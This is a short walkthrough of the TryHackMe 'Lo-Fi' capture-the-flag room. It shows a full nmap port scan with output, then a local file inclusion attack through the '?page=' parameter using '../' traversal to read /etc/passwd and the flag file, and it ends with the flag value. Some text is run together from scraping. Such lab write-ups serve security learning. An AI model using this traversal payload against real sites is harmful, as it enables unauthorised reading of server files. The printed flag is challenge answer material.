TryHackMe | Lo-Fi
Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!
This is the Walkthrough for TryHackMe “Lo-Fi”.
Task1
Q1. Climb the filesystem to find the flag!
Perform a port scan.
$ nmap -Pn -T4 -sVC -A -p- 10.10.174.194 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a5:97:85:99:30:80:e2:7b:02:b1:ac:c9:65:e1:9d:05 (RSA)
| 256 e8:dc:f6:8d:84:fa:ab:0d:80:77:23:47:78:f4:31:ad (ECDSA)
|_ 256 24:82:a1:9c:a6:3b:38:58:52:c2:21:13:25:86:55:f8 (ED25519)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)
You now know the operational status of the port.
| port | service | version |
|---|---|---|
| 22 | ssh | OpenSSH 8.2p1 |
| 80 | http | Apache/2.2.22 |
80Access the number port.
DiscographyWhen you click on the link, the file specified by is loaded.?page=
It looks like LFI can be done.
I was able to load the file as follows.?page=../../../../../../etc/passwd/etc/passwd
?page=../../../../../../flag.txtI was able to get the flag at .
A. flag{e4478e0eab69bd642b8238765dcb7d18}